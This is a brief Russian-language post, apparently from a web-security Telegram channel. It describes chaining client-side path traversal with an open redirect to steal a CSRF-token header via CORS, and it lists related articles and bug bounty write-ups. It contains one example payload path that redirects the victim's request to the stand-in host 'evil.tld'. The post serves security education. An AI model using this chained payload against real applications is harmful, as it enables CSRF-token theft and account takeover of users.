Про сlient-side path traversal

Не все знают, но если на сайте есть open redirect и client side path traversal вы можете воровать заголовок с CSRF токеном через CORS запрос.

Например, если приложение через fetch() добавляет заголовок csrfToken при обращении к /api/user, то с помощью path traversal и open redirect'а мы можем похитить заголовок, отправив жертву на /api/user/../redirect?to=evil.tld/corsAllow

Еще больше практических примеров использования path traversal на стороне клиента вы можете узнать из статей, представленных ниже:

➖Practical Example Of Client Side Path Manipulation
➖From an Innocent Client-Side Path Traversal to Account Takeover
➖Client-side path traversal vulnerability class explained - $6,580 GitLab bug bounty

➖Practical Client Side Path Traversal Attacks
➖The power of Client-Side Path Traversal: How I found and escalated 2 bugs through "../"

#web #cspt
👍 22
🔥 4
115 6.3K

Обсуждение 0

Обсуждение не доступно в веб-версии. Чтобы написать комментарий, перейдите в приложение Telegram.

Обсудить в Telegram